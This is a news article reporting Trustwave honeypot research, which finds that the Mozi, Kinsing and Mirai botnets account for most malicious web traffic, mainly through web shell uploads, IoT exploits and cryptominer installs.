Botnets responsible for over 95% malicious web traffic globally: Report

Botnets are globally responsible for over 95% of malicious web traffic, according to research conducted by managed cybersecurity provider Trustwave.

For the research, Trustwave implemented a network of honeypots located in multiple countries including Russia, Ukraine, Poland, the UK, China, and the United States.

“By distributing honeypots in such a manner, we can gather a reliable set of information on the methods and techniques used by attackers and their botnets, allowing a comprehensive understanding of the current database threat landscape,” Trustwave said in the research.

As a result of this research, Trustwave was able to identify the exploitation of a few specific vulnerable enterprise applications in the wild, including Forta GoAnywhere MFT, Microsoft Exchange, Fortinet FortiNAC, Atlassian Bitbucket, and F5 Big-IP, which were exploited days after the release of their proof-of-concept (PoC) exploit codes.

Most malicious traffic was from botnets

During its six-month period that ended May 2023, the research claims analysis of 38,000 unique IPs, downloading a little over 1,100 payloads served in exploitation attempts.

“Almost 19% of the total recorded web traffic was malicious, and botnets were responsible for over 95% of the malicious web traffic detected,” the report said.

The primary objective of these botnet attacks was to upload a web shell, a malicious script for unauthorized access into compromised websites or servers, enabling attackers to carry out further actions against Trustwave’s honeypots posing as potential victims.

Mozi, Kinsing, and Mirai led the offensive

On further analysis, the research identified Mozi, Kinsing, and Mirai botnets accounting for almost all (95%) of these exploitation attempts. While Mozi accounted for 73% of the botnets used, Mirai and Kinsing contributed to 9% and 13% respectively.

“These malware families are mostly known to explore vulnerabilities in internet-connected devices and assemble them into botnets used to either carry out distributed denial of service (DDoS) attacks, or mine cryptocurrencies,” the report said.

Both Mozi and Mirai botnets exploited IoT vulnerabilities including Netgear routers, MVPower DVR, D-link routers, Realtek SDK, etc. Kinsing botnets, however, attempted installing XMRig cryptocurrency miner in Linux-based systems using various vulnerabilities including those in Apache HTTP Server, PHPUnit, ThinkCMF, and ThinkPHP. “Due to the manner in which our honeypots were implemented, we were unable to scrutinize the subsequent actions that the attackers might have taken,” the report said.